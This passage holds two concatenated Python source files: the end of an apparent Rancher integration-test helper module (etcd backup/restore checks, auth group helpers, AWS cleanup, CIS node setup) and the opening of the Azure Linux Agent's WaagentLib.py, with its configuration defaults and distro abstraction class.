403: Forbidden" error_code = e.value.error.code error_status = e.value.error.status assert error_status == 403 and error_code == 'Forbidden', error_msg return None else: try: client.create_catalog(name=catalog_name, branch=branch, url=url) except ApiError as e: assert False, "user with permission should receive no exception:" \ + str(e.error.status) + " " + e.error.code catalog_list = client.list_catalog(name=catalog_name).data assert len(catalog_list) == 1 return catalog_list[0] def generate_template_global_role(name, new_user_default=False, template=None): """ generate a template that is used for creating a global role""" if template is None: template = TEMPLATE_MANAGE_CATALOG template = deepcopy(template) if new_user_default: template["newUserDefault"] = "true" else: template["newUserDefault"] = "false" if name is None: name = random_name() template["name"] = name return template def wait_for_backup_to_active(cluster, backupname, timeout=DEFAULT_TIMEOUT): start = time.time() etcdbackups = cluster.etcdBackups(name=backupname) assert len(etcdbackups) == 1 etcdbackupdata = etcdbackups['data'] etcdbackupstate = etcdbackupdata[0]['state'] while etcdbackupstate != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) etcdbackups = cluster.etcdBackups(name=backupname) assert len(etcdbackups) == 1 etcdbackupdata = etcdbackups['data'] etcdbackupstate = etcdbackupdata[0]['state'] print("BACKUP STATE") print(etcdbackupstate) return etcdbackupstate def wait_for_backup_to_delete(cluster, backupname, timeout=DEFAULT_TIMEOUT): start = time.time() etcdbackups = cluster.etcdBackups(name=backupname) while len(etcdbackups) == 1: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for backup to be deleted") time.sleep(.5) etcdbackups = cluster.etcdBackups(name=backupname) def validate_backup_create(namespace, backup_info, backup_mode=None): p_client = namespace["p_client"] ns = namespace["ns"] cluster = namespace["cluster"] name = random_test_name("default") if not hasattr(cluster, 'rancherKubernetesEngineConfig'): assert False, "Cluster is not of type RKE" con = [{"name": "test1", "image": TEST_IMAGE}] backup_info["workload"] = p_client.create_workload(name=name, containers=con, namespaceId=ns.id, daemonSetConfig={}) validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name, len(get_schedulable_nodes(cluster))) host = "test" + str(random_int(10000, 99999)) + ".com" namespace["host"] = host path = "/name.html" rule = {"host": host, "paths": [{"workloadIds": [backup_info["workload"].id], "targetPort": "80"}]} p_client.create_ingress(name=name, namespaceId=ns.id, rules=[rule]) validate_ingress(p_client, cluster, [backup_info["workload"]], host, path) # Perform Backup backup = cluster.backupEtcd() backup_info["backupname"] = backup['metadata']['name'] wait_for_backup_to_active(cluster, backup_info["backupname"]) # Get all the backup info etcdbackups = cluster.etcdBackups(name=backup_info["backupname"]) backup_info["etcdbackupdata"] = etcdbackups['data'] backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id'] if backup_mode == "s3": backupfileurl = backup_info["etcdbackupdata"][0]['filename'] # Check the backup filename exists in S3 parseurl = urlparse(backupfileurl) backup_info["backupfilename"] = os.path.basename(parseurl.path) backup_found = AmazonWebServices().s3_backup_check( backup_info["backupfilename"]) assert backup_found, "the backup was not found in the S3 bucket" elif backup_mode == 'filesystem': for node in namespace['nodes']: if 'etcd' not in node.roles: continue get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots' response = node.execute_command(get_filesystem_snapshots)[0] assert backup_info["etcdbackupdata"][0]['filename'] in response, \ "The filename doesn't match any of the files locally" return namespace, backup_info def validate_backup_restore(namespace, backup_info): p_client = namespace["p_client"] ns = namespace["ns"] client = get_user_client() cluster = namespace["cluster"] name = random_test_name("default") host = namespace["host"] path = "/name.html" con = [{"name": "test1", "image": TEST_IMAGE}] # Create workload after backup testworkload = p_client.create_workload(name=name, containers=con, namespaceId=ns.id) validate_workload(p_client, testworkload, "deployment", ns.name) # Perform Restore cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"]) # After restore, validate cluster validate_cluster(client, cluster, intermediate_state="updating", check_intermediate_state=True, skipIngresscheck=False) # Verify the ingress created before taking the snapshot validate_ingress(p_client, cluster, [backup_info["workload"]], host, path) # Verify the workload created after getting a snapshot does not exist # after restore workload_list = p_client.list_workload(uuid=testworkload.uuid).data print(len(workload_list)) assert len(workload_list) == 0, "workload shouldn't exist after restore" return namespace, backup_info def validate_backup_delete(namespace, backup_info, backup_mode=None): client = get_user_client() cluster = namespace["cluster"] client.delete( cluster.etcdBackups(name=backup_info["backupname"])['data'][0] ) wait_for_backup_to_delete(cluster, backup_info["backupname"]) assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \ "backup shouldn't be listed in the Cluster backups" if backup_mode == "s3": # Check the backup reference is deleted in Rancher and S3 backup_found = AmazonWebServices().s3_backup_check( backup_info["backupfilename"]) assert_message = "The backup should't exist in the S3 bucket" assert backup_found is False, assert_message elif backup_mode == 'filesystem': for node in namespace['nodes']: if 'etcd' not in node.roles: continue get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots' response = node.execute_command(get_filesystem_snapshots)[0] filename = backup_info["etcdbackupdata"][0]['filename'] assert filename not in response, \ "The file still exist in the filesystem" def apply_crd(ns, file, kubectl_context): return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name, json_out=False, stderr=True, kubeconfig=kubectl_context).decode("ascii") def get_crd(ns, crd_name, kubectl_context): return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name, json_out=False, stderr=True, kubeconfig=kubectl_context).decode("ascii") def delete_crd(ns, file, kubectl_context): return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name, json_out=False, stderr=True, kubeconfig=kubectl_context).decode("ascii") def prepare_auth_data(): name = \ os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource", AUTH_PROVIDER.lower() + ".json") with open(name) as reader: auth_data = reader.read() raw = json.loads(auth_data).get("nested_group_info") nested_group["auth_info"] = raw.copy() nested_group["users"] = raw.get("users") raw.pop("users") nested_group["group_dic"] = raw nested_group["groups"] = raw.keys() def is_nested(): """ check if the provided groups are nested groups, return True if at least one of the groups contains other groups """ count = 0 for user, group in nested_group["group_dic"].items(): if len(group) == 0: count += 1 if count < len(nested_group["group_dic"]): return True return False def get_group(nested=False): """ return a group or a nested group""" if nested: # return the name of a group that contains at least one other group for item in nested_group["groups"]: if len(nested_group["group_dic"].get(item).get("users")) == 0: pass sub_groups = nested_group["group_dic"].get(item).get("groups") if len(sub_groups) == 0: pass for g in sub_groups: if len(nested_group["group_dic"].get(g).get("users")) > 0: return item assert False, "cannot find any valid nested group" else: # return the name of a group that has at least one direct user for group in nested_group["groups"]: if len(nested_group["group_dic"].get(group).get("users")) > 0: return group assert False, "cannot find any valid non-nested group" def get_user_by_group(group, nested=False): """ return the list of uses in the group or nested group if nested is False, return the direct users in the group; otherwise, return all users including those from nested groups """ def get_user_in_nested_group(group, source): if group == "": return [] users = source["group_dic"].get(group).get("users") for sub_group in source["group_dic"].get(group).get("groups"): temp = get_user_in_nested_group(sub_group, source) for user in temp: if user not in users: users.append(user) return users if nested: users = get_user_in_nested_group(group, nested_group) assert len(users) > 0, "no user in the group" else: users = nested_group["group_dic"].get(group).get("users") assert users is not None, "no user in the group" print("group: {}, users: {}".format(group, users)) return users def get_a_group_and_a_user_not_in_it(nested=False): """ return a group or a nested group and a user that is not in the group""" all_users = nested_group["users"] for group in nested_group["groups"]: group_users = get_user_by_group(group, nested) for user in all_users: if user not in group_users: print("group: {}, user not in it: {}".format(group, user)) return group, user assert False, "cannot find a group and a user not in it" def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200): """ get the group's principal id from the auth provider""" headers = {'Authorization': 'Bearer ' + token} r = requests.post(CATTLE_AUTH_PRINCIPAL_URL, json={'name': group_name, 'principalType': 'group', 'responseType': 'json'}, verify=False, headers=headers) assert r.status_code == expected_status return r.json()['data'][0]["id"] def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL): """ login with the user account from the auth provider, and return the user token""" r = requests.post(login_url, json={ 'username': username, 'password': password, 'responseType': 'json', }, verify=False) assert r.status_code in [200, 201] return r.json() def validate_service_discovery(workload, scale, p_client=None, ns=None, testclient_pods=None): expected_ips = [] pods = p_client.list_pod(workloadId=workload["id"]).data assert len(pods) == scale for pod in pods: expected_ips.append(pod["status"]["podIp"]) host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id) for pod in testclient_pods: validate_dns_entry(pod, host, expected_ips) def auth_get_project(): return auth_rbac_data["project"] def auth_get_namespace(): return auth_rbac_data["namespace"] def auth_get_user_token(username): if username in auth_rbac_data["users"].keys(): return auth_rbac_data["users"][username].token return None def add_role_to_user(user, role): """this function adds a user from the auth provider to given cluster""" admin_client, cluster = get_global_admin_client_and_cluster() project = auth_get_project() ns = auth_get_namespace() if not (project and ns): project, ns = create_project_and_ns(ADMIN_TOKEN, cluster, random_test_name("p-test-auth")) auth_rbac_data["project"] = project auth_rbac_data["namespace"] = ns if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]: assign_members_to_project(admin_client, user, project, role) else: assign_members_to_cluster(admin_client, user, cluster, role) auth_rbac_data["users"][user.username] = user def auth_resource_cleanup(): """ remove the project and namespace created for the AUTH tests""" client, cluster = get_global_admin_client_and_cluster() client.delete(auth_rbac_data["project"]) auth_rbac_data["project"] = None auth_rbac_data["ns"] = None for username, user in auth_rbac_data["users"].items(): user_crtbs = client.list_cluster_role_template_binding(userId=user.id) for crtb in user_crtbs: client.delete(crtb) class WebsocketLogParse: """ the class is used for receiving and parsing the message received from the websocket """ def __init__(self): self.lock = Lock() self._last_message = '' def receiver(self, socket, skip): """ run a thread to receive and save the message from the web socket :param socket: the socket connection :param skip: if True skip the first char of the received message """ while True and socket.connected: try: data = socket.recv() # the message from the kubectl contains an extra char if skip: data = data[1:] if len(data) < 5: pass data = base64.b64decode(data).decode() self.lock.acquire() self._last_message += data self.lock.release() except websocket.WebSocketConnectionClosedException: print("Connection closed") break except websocket.WebSocketProtocolException as wpe: print("Error: {}".format(wpe)) break @staticmethod def start_thread(target, args): thread = Thread(target=target, args=args) thread.daemon = True thread.start() time.sleep(1) @property def last_message(self): return self._last_message @last_message.setter def last_message(self, value): self.lock.acquire() self._last_message = value self.lock.release() def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT): start = time.time() cluster = client.list_cluster(name=cluster_name).data cluster_count = len(cluster) while cluster_count != 0: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for cluster to get deleted") time.sleep(.5) cluster = client.list_cluster(name=cluster_name).data cluster_count = len(cluster) def create_connection(url, subprotocols): """ create a webscoket connection and check if it is connected :param url: the url to connect to :param subprotocols: the list of subprotocols :return: """ ws = websocket.create_connection( url=url, sslopt={"cert_reqs": ssl.CERT_NONE}, subprotocols=subprotocols, timeout=10, cookie="R_SESS=" + USER_TOKEN ) assert ws.connected, "failed to build the websocket" return ws def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT): start = time.time() hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data assert len(hpalist) == 1 hpa = hpalist[0] while hpa.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data assert len(hpas) == 1 hpa = hpas[0] return hpa def create_pv_pvc(client, ns, nfs_ip, cluster_client): pv_object = create_pv(cluster_client, nfs_ip) pvc_name = random_test_name("pvc") pvc_config = {"accessModes": ["ReadWriteOnce"], "name": pvc_name, "volumeId": pv_object.id, "namespaceId": ns.id, "storageClassId": "", "resources": {"requests": {"storage": "10Gi"}} } pvc_object = client.create_persistent_volume_claim(pvc_config) pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300) return pv_object, pvc_object def create_pv(client, nfs_ip): pv_name = random_test_name("pv") pv_config = {"type": "persistentVolume", "accessModes": ["ReadWriteOnce"], "name": pv_name, "nfs": {"readOnly": "false", "type": "nfsvolumesource", "path": NFS_SERVER_MOUNT_PATH, "server": nfs_ip }, "capacity": {"storage": "50Gi"} } pv_object = client.create_persistent_volume(pv_config) capacitydict = pv_object['capacity'] assert capacitydict['storage'] == '50Gi' assert pv_object['type'] == 'persistentVolume' return pv_object def delete_resource_in_AWS_by_prefix(resource_prefix): """ :param resource_prefix: the prefix of resource name :return: None """ # delete nodes of both local and custom clusters node_filter = [{ 'Name': 'tag:Name', 'Values': [resource_prefix + "-*"] }] nodes = AmazonWebServices().get_nodes(filters=node_filter) if nodes is None: print("deleting the following instances: None") else: print("deleting the following instances: {}" .format([node.public_ip_address for node in nodes])) AmazonWebServices().delete_nodes(nodes) # delete load balancer and target groups tg_list = [] lb_list = [] lb_names = [resource_prefix + '-nlb', resource_prefix + '-multinode-nlb', resource_prefix + '-k3s-nlb'] for name in lb_names: lb_arn = AmazonWebServices().get_lb(name) if lb_arn is not None: lb_list.append(lb_arn) res = AmazonWebServices().get_target_groups(lb_arn) tg_list.extend(res) print("deleting the following load balancers: {}".format(lb_list)) print("deleting the following target groups: {}".format(tg_list)) for lb in lb_list: AmazonWebServices().delete_lb(lb) for tg in tg_list: AmazonWebServices().delete_target_group(tg) # delete rds db_name = resource_prefix + "-multinode-db" print("deleting the database: {}".format(db_name)) AmazonWebServices().delete_db(db_name) # delete the route 53 record record_name = resource_prefix + ".qa.rancher.space." print("deleting the route53 record: {}".format(record_name)) AmazonWebServices().delete_route_53_record(record_name) print("deletion is done") return None def configure_cis_requirements(aws_nodes, profile, node_roles, client, cluster): i = 0 if profile == 'rke-cis-1.4': for aws_node in aws_nodes: aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1") aws_node.execute_command("sudo sysctl -w kernel.panic=10") aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1") if node_roles[i] == ["etcd"]: aws_node.execute_command("sudo useradd etcd") docker_run_cmd = \ get_custom_host_registration_cmd(client, cluster, node_roles[i], aws_node) aws_node.execute_command(docker_run_cmd) i += 1 elif profile == 'rke-cis-1.5': for aws_node in aws_nodes: aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1") aws_node.execute_command("sudo sysctl -w kernel.panic=10") aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0") aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1") aws_node.execute_command("sudo sysctl -w " "kernel.keys.root_maxbytes=25000000") if node_roles[i] == ["etcd"]: aws_node.execute_command("sudo groupadd -g 52034 etcd") aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd") docker_run_cmd = \ get_custom_host_registration_cmd(client, cluster, node_roles[i], aws_node) aws_node.execute_command(docker_run_cmd) i += 1 time.sleep(5) cluster = validate_cluster_state(client, cluster) # the workloads under System project to get active time.sleep(20) if profile == 'rke-cis-1.5': create_kubeconfig(cluster) network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml" account_update_file = DATA_SUBDIR + "/account_update.yaml" items = execute_kubectl_cmd("get namespaces -A")["items"] all_ns = [item["metadata"]["name"] for item in items] for ns in all_ns: execute_kubectl_cmd("apply -f {0} -n {1}". format(network_policy_file, ns)) execute_kubectl_cmd('patch serviceaccount default' ' -n {0} -p "$(cat {1})"'. format(ns, account_update_file)) return cluster
WaagentLib.py
#!/usr/bin/env python # # Azure Linux Agent # # Copyright 2015 Microsoft Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Requires Python 2.6+ and Openssl 1.0+ # # Implements parts of RFC 2131, 1541, 1497 and # http://msdn.microsoft.com/en-us/library/cc227282%28PROT.10%29.aspx # http://msdn.microsoft.com/en-us/library/cc227259%28PROT.13%29.aspx # import crypt import random import base64 try: import httplib as httplibs except ImportError: import http.client as httplibs import os import os.path import platform import pwd import re import shutil import socket try: import SocketServer as SocketServers except ImportError: import socketserver as SocketServers import string import subprocess import sys import tempfile import textwrap import threading import time import traceback import xml.dom.minidom import inspect import zipfile import json import datetime import xml.sax.saxutils from distutils.version import LooseVersion if not hasattr(subprocess, 'check_output'): def check_output(*popenargs, **kwargs): r"""Backport from subprocess module from python 2.7""" if 'stdout' in kwargs: raise ValueError('stdout argument not allowed, it will be overridden.') process = subprocess.Popen(stdout=subprocess.PIPE, *popenargs, **kwargs) output, unused_err = process.communicate() retcode = process.poll() if retcode: cmd = kwargs.get("args") if cmd is None: cmd = popenargs[0] raise subprocess.CalledProcessError(retcode, cmd, output=output) return output # Exception classes used by this module. class CalledProcessError(Exception): def __init__(self, returncode, cmd, output=None): self.returncode = returncode self.cmd = cmd self.output = output def __str__(self): return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode) subprocess.check_output = check_output subprocess.CalledProcessError = CalledProcessError GuestAgentName = "WALinuxAgent" GuestAgentLongName = "Azure Linux Agent" GuestAgentVersion = "WALinuxAgent-2.0.16" ProtocolVersion = "2012-11-30" # WARNING this value is used to confirm the correct fabric protocol. Config = None WaAgent = None DiskActivated = False Openssl = "openssl" Children = [] ExtensionChildren = [] VMM_STARTUP_SCRIPT_NAME = 'install' VMM_CONFIG_FILE_NAME = 'linuxosconfiguration.xml' global RulesFiles RulesFiles = ["/lib/udev/rules.d/75-persistent-net-generator.rules", "/etc/udev/rules.d/70-persistent-net.rules"] VarLibDhcpDirectories = ["/var/lib/dhclient", "/var/lib/dhcpcd", "/var/lib/dhcp"] EtcDhcpClientConfFiles = ["/etc/dhcp/dhclient.conf", "/etc/dhcp3/dhclient.conf"] global LibDir LibDir = "/var/lib/waagent" global provisioned provisioned = False global provisionError provisionError = None HandlerStatusToAggStatus = {"installed": "Installing", "enabled": "Ready", "unintalled": "NotReady", "disabled": "NotReady"} WaagentConf = """\ # # Azure Linux Agent Configuration # Role.StateConsumer=None # Specified program is invoked with the argument "Ready" when we report ready status # to the endpoint server. Role.ConfigurationConsumer=None # Specified program is invoked with XML file argument specifying role configuration. Role.TopologyConsumer=None # Specified program is invoked with XML file argument specifying role topology. Provisioning.Enabled=y # Provisioning.DeleteRootPassword=y # Password authentication for root account will be unavailable. Provisioning.RegenerateSshHostKeyPair=y # Generate fresh host key pair. Provisioning.SshHostKeyPairType=rsa # Supported values are "rsa", "dsa" and "ecdsa". Provisioning.MonitorHostName=y # Monitor host name changes and publish changes via DHCP requests. ResourceDisk.Format=y # Format if unformatted. If 'n', resource disk will not be mounted. ResourceDisk.Filesystem=ext4 # Typically ext3 or ext4. FreeBSD images should use 'ufs2' here. ResourceDisk.MountPoint=/mnt/resource # ResourceDisk.EnableSwap=n # Create and use swapfile on resource disk. ResourceDisk.SwapSizeMB=0 # Size of the swapfile. LBProbeResponder=y # Respond to load balancer probes if requested by Azure. Logs.Verbose=n # Enable verbose logs OS.RootDeviceScsiTimeout=300 # Root device timeout in seconds. OS.OpensslPath=None # If "None", the system default version is used. """ README_FILENAME = "DATALOSS_WARNING_README.txt" README_FILECONTENT = """\ WARNING: THIS IS A TEMPORARY DISK. Any data stored on this drive is SUBJECT TO LOSS and THERE IS NO WAY TO RECOVER IT. Please do not use this disk for storing any personal or application data. For additional details to please refer to the MSDN documentation at : http://msdn.microsoft.com/en-us/library/windowsazure/jj672979.aspx """ ############################################################ # BEGIN DISTRO CLASS DEFS ############################################################ ############################################################ # AbstractDistro ############################################################ class AbstractDistro(object): """ AbstractDistro defines a skeleton neccesary for a concrete Distro class. Generic methods and attributes are kept here, distribution specific attributes and behavior are to be placed in the concrete child named distroDistro, where distro is the string returned by calling python platform.linux_distribution()[0]. So for CentOS the derived class is called 'centosDistro'. """ def __init__(self): """ Generic Attributes go here. These are based on 'majority rules'. This __init__() may be called or overriden by the child. """ self.agent_service_name = os.path.basename(sys.argv[0]) self.selinux = None self.service_cmd = '/usr/sbin/service' self.ssh_service_restart_option = 'restart' self.ssh_service_name = 'ssh' self.ssh_config_file = '/etc/ssh/sshd_config' self.hostname_file_path = '/etc/hostname' self.dhcp_client_name = 'dhclient' self.requiredDeps = ['route', 'shutdown', 'ssh-keygen', 'useradd', 'usermod', 'openssl', 'sfdisk', 'fdisk', 'mkfs', 'sed', 'grep', 'sudo', 'parted'] self.init_script_file = '/etc/init.d/waagent' self.agent_package_name = 'WALinuxAgent' self.fileBlackList = ["/root/.bash_history", "/var/log/waagent.log", '/etc/resolv.conf'] self.agent_files_to_uninstall = ["/etc/waagent.conf", "/etc/logrotate.d/waagent"] self.grubKernelBootOptionsFile = '/etc/default/grub' self.grubKernelBootOptionsLine = 'GRUB_CMDLINE_LINUX_DEFAULT=' self.getpidcmd = 'pidof' self.mount_dvd_cmd = 'mount' self.sudoers_dir_base = '/etc' self.waagent_conf_file = WaagentConf self.shadow_file_mode = 0o600 self.shadow_file_path = "/etc/shadow" self.dhcp_enabled = False def isSelinuxSystem(self): """ Checks and sets self.selinux = True if SELinux is available on system. """ if self.selinux == None: if Run("which getenforce", chk_err=False): self.selinux = False else: self.selinux = True return self.selinux def isSelinuxRunning(self): """ Calls shell command 'getenforce' and returns True if 'Enforcing'. """ if self.isSelinuxSystem(): return RunGetOutput("getenforce")[1].startswith("Enforcing") else: return False def setSelinuxEnforce(self, state): """ Calls shell command 'setenforce' with 'state' and returns resulting exit code. """ if self.isSelinuxSystem(): if state: s = '1' else: s = '0' return Run("setenforce " + s) def setSelinuxContext(self, path, cn): """ Calls shell 'chcon' with 'path' and 'cn' context. Returns exit result. """ if self.isSelinuxSystem(): if not os.path.exists(path): Error("Path does not exist: {0}".format(path)) return 1 return Run('chcon ' + cn + ' ' + path) def setHostname(self, name): """ Shell call to hostname. Returns resulting exit code. """ return Run('hostname ' + name) def publishHostname(self, name): """ Set the contents of the hostname file to 'name'. Return 1 on failure. """ try: r = SetFileContents(self.hostname_file_path, name) for f in EtcDhcpClientConfFiles: if os.path.exists(f) and FindStringInFile(f, r'^[^#]*?send\s*host-name.*?(<hostname>|gethostname[(,)])') == None: r = ReplaceFileContentsAtomic('/etc/dhcp/dhclient.conf', "send host-name \"" + name + "\";\n" + "\n".join(filter(lambda a: not a.startswith("send host-name"), GetFileContents('/etc/dhcp/dhclient.conf').split( '\n')))) except: return 1 return r def installAgentServiceScriptFiles(self): """ Create the waagent support files for service installation. Called by registerAgentService() Abstract Virtual Function. Over-ridden in concrete Distro classes. """ pass def registerAgentService(self): """ Calls installAgentService to create service files. Shell exec service registration commands. (e.g. chkconfig --add waagent) Abstract Virtual Function. Over-ridden in concrete Distro classes. """ pass def uninstallAgentService(self): """ Call service subsystem to remove waagent script. Abstract Virtual Function. Over-ridden in concrete Distro classes. """ pass def unregisterAgentService(self): """ Calls self.stopAgentService and call self.uninstallAgentService() """ self.stopAgentService() self.uninstallAgentService() def startAgentService(self): """ Service call to start the Agent service """ return Run(self.service_cmd + ' ' + self.agent_service_name + ' start') def stopAgentService(self): """ Service call to stop the Agent service """ return Run(self.service_cmd + ' ' + self.agent_service_name + ' stop', False) def restartSshService(self): """ Service call to re(start) the SSH service """ sshRestartCmd = self.service_cmd + " " + self.ssh_service_name + " " + self.ssh_service_restart_option retcode = Run(sshRestartCmd) if retcode > 0: Error("Failed to restart SSH service with return code:" + str(retcode)) return retcode def checkPackageInstalled(self, p): """ Query package database for prescence of an installed package. Abstract Virtual Function. Over-ridden in concrete Distro classes. """ pass def checkPackageUpdateable(self, p): """ Online check if updated package of walinuxagent is available. Abstract Virtual Function. Over-ridden in concrete Distro classes. """ pass def deleteRootPassword(self): """ Generic root password removal. """ filepath = "/etc/shadow" ReplaceFileContentsAtomic(filepath, "root:*LOCK*:14600::::::\n" + "\n".join( filter(lambda a: not a.startswith("root:"), GetFileContents(filepath).split('\n')))) os.chmod(filepath, self.shadow_file_mode) if self.isSelinuxSystem(): self.setSelinuxContext(filepath, 'system_u:object_r:shadow_t:s0') Log("Root password deleted.") return 0 def changePass(self, user, password): Log("Change user password") crypt_id = Config.get("Provisioning.PasswordCryptId") if crypt_id is None: crypt_id = "6" salt_len = Config.get("Provisioning.PasswordCryptSaltLength") try: salt_len = int(salt_len) if salt_len < 0 or salt_len > 10: salt_len = 10 except (ValueError, TypeError): salt_len = 10 return self.chpasswd(user, password, crypt_id=crypt_id, salt_len=salt_len) def chpasswd(self, username, password, crypt_id=6, salt_len=10): passwd_hash = self.gen_password_hash(password, crypt_id, salt_len) cmd = "usermod -p '{0}' {1}".format(passwd_hash, username) ret, output = RunGetOutput(cmd, log_cmd=False) if ret != 0: return "Failed to set password for {0}: {1}".format(username, output) def gen_password_hash(self, password, crypt_id, salt_len): collection = string.ascii_letters + string.digits salt = ''.join(random.choice(collection) for _ in range(salt_len)) salt = "${0}${1}".format(crypt_id, salt) return crypt.crypt(password, salt) def load_ata_piix(self): return WaAgent.TryLoadAtapiix() def unload_ata_piix(self): """ Generic function to remove ata_piix.ko. """ return WaAgent.TryUnloadAtapiix() def deprovisionWarnUser(self): """ Generic user warnings used at deprovision. """ print("WARNING! Nameserver configuration in /etc/resolv.conf will be deleted.") def deprovisionDeleteFiles(self): """ Files to delete when VM is deprovisioned """ for a in VarLibDhcpDirectories: Run("rm -f " + a + "/*") # Clear LibDir, remove nameserver and root bash history for f in os.listdir(LibDir) + self.fileBlackList: try: os.remove(f) except: pass return 0 def uninstallDeleteFiles(self): """ Files to delete when agent is uninstalled. """ for f in self.agent_files_to_uninstall: try: os.remove(f) except: pass return 0 def checkDependencies(self): """ Generic dependency check. Return 1 unless all dependencies are satisfied. """ if self.checkPackageInstalled('NetworkManager'): Error(GuestAgentLongName + " is not compatible with network-manager.") return 1 try: m = __import__('pyasn1') except ImportError: Error(GuestAgentLongName + " requires python-pyasn1 for your Linux distribution.") return 1 for a in self.requiredDeps: if Run("which " + a + " > /dev/null 2>&1", chk_err=False): Error("Missing required dependency: " + a) return 1 return 0 def packagedInstall(self, buildroot): """ Called from setup.py for use by RPM. Copies generated files waagent.conf, under the buildroot. """ if not os.path.exists(buildroot + '/etc'): os.mkdir(buildroot + '/etc') SetFileContents(buildroot + '/etc/waagent.conf', MyDistro.waagent_conf_file) if not os.path.exists(buildroot + '/etc/logrotate.d'): os.mkdir(buildroot + '/etc/logrotate.d') SetFileContents(buildroot + '/etc/logrotate.d/waagent', WaagentLogrotate) self.init_script_file = buildroot + self.init_script_file # this allows us to call installAgentServiceScriptFiles() if not os.path.exists(os.path.dirname(self.init_script_file)): os.mkdir(os.path.dirname(self.init_script_file)) self.installAgentServiceScriptFiles() def RestartInterface(self, iface, max_retry=3): for retry in range(1, max_retry + 1): ret = Run("ifdown " + iface + " && ifup " + iface) if ret == 0: return Log("Failed to restart interface: {0}, ret={1}".format(iface, ret)) if retry < max_retry: Log("Retry restart interface in 5 seconds") time.sleep(5) def CreateAccount(self, user, password, expiration, thumbprint): return CreateAccount(user, password, expiration, thumbprint) def DeleteAccount(self, user): return DeleteAccount(user) def Install(self): return Install() def mediaHasFilesystem(self, dsk): if len(dsk) == 0: return False if Run("LC_ALL=C fdisk -l " + dsk + " | grep Disk"): return False return True def mountDVD(self, dvd, location): return RunGetOutput(self.mount_dvd_cmd + ' ' + dvd + ' ' + location) def GetHome(self): return GetHome() def getDhcpClientName(self): return self.dhcp_client_name def initScsiDiskTimeout(self): """ Set the SCSI disk timeout when the agent starts running """ self.setScsiDiskTimeout() def setScsiDiskTimeout(self): """ Iterate all SCSI disks(include hot-add) and set their timeout if their value are different from the OS.RootDeviceScsiTimeout """ try: scsiTimeout = Config.get("OS.RootDeviceScsiTimeout") for diskName in [disk for disk in os.listdir("/sys/block") if disk.startswith("sd")]: self.setBlockDeviceTimeout(diskName, scsiTimeout) except: pass def setBlockDeviceTimeout(self, device, timeout): """ Set SCSI disk timeout by set /sys/block/sd*/device/timeout """ if timeout != None and device: filePath = "/sys/block/" + device + "/device/timeout" if (GetFileContents(filePath).splitlines()[0].rstrip() != timeout): SetFileContents(filePath, timeout) Log("SetBlockDeviceTimeout: Update the device " + device + " with timeout " + timeout) def waitForSshHostKey(self, path): """ Provide a dummy waiting, since by default, ssh host key is created by waagent and the key should already been created. """ if (os.path.isfile(path)): return True else: Error("Can't find host key: {0}".format(path)) return False def isDHCPEnabled(self): return self.dhcp_enabled def stopDHCP(self): """ Stop the system DHCP client so that the agent can bind on its port. If the distro has set dhcp_enabled to True, it will need to provide an implementation of this method. """ raise NotImplementedError('stopDHCP method missing') def startDHCP(self): """ Start the system DHCP client. If the distro has set dhcp_enabled to True, it will need to provide an implementation of this method. """ raise NotImplementedError('startDHCP method missing') def translateCustomData(self, data): """ Translate the custom data from a Base64 encoding. Default to no-op. """ decodeCustomData = Config.get("Provisioning.DecodeCustomData") if decodeCustomData != None and decodeCustomData.lower().startswith("y"): return base64.b64decode(data) return data def getConfigurationPath(self): return "/etc/waagent.conf" def getProcessorCores(self): return int(RunGetOutput("grep 'processor.*:' /proc/cpuinfo |wc -l")[1]) def getTotalMemory(self): return int(RunGetOutput("grep MemTotal /proc/meminfo |awk '{print $2}'")[1]) / 1024 def getInterfaceNameByMac(self, mac): ret, output = RunGetOutput("ifconfig -a") if ret != 0: raise Exception("Failed to get network interface info") output = output.replace('\n', '') match = re.search(r"(eth\d).*(HWaddr|ether) {0}".format(mac), output, re.IGNORECASE) if match is None: raise Exception("Failed to get ifname with mac: {0}".format(mac)) output = match.group(0) eths = re.findall(r"eth\d", output) if eths is None or len(eths) == 0: raise Exception("Failed to get ifname with mac: {0}".format(mac)) return eths[-1] def configIpV4(self, ifName, addr, netmask=24): ret, output = RunGetOutput("ifconfig {0} up".format(ifName)) if ret != 0: raise Exception("Failed to bring up {0}: {1}".format(ifName, output)) ret, output = RunGetOutput("ifconfig {0} {1}/{2}".format(ifName, addr, netmask)) if ret != 0: raise Exception("Failed to config 